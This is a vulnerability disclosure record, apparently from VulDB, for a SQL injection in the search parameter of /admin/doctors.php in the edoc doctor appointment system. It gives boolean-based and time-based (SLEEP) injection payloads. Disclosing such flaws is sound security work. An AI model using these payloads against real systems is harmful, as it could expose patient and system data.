Title | Sql injection exists for search parameter of edoc doctor appointment system |
---|
Description | SQL injection vulnerability exists in search parameter of /admin/doctors.php file of edoc doctor appointment system
Important user data or system data may be leaked and system security may be compromised.The environment is secure and the information can be used by malicious users.
Payload:search=Test Doctor' AND 6098=6098 AND 'YaJr'='YaJr
or search=Test Doctor' AND (SELECT 4403 FROM (SELECT(SLEEP(5)))jqSz) AND
'jDlM'='jDlM |
---|
Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/edoc%20doctor%20appointment%20system/edoc%20doctor%20appointment%20system%20vlun3.pdf |
---|
User | SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874) |
---|
Submission | 02/27/2023 08:22 AM (2 years ago) |
---|
Moderation | 02/27/2023 12:07 PM (4 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 221824 [SourceCodester Doctors Appointment System 1.0 Parameter /admin/doctors.php search/id sql injection] |
---|
Points | 20 |
---|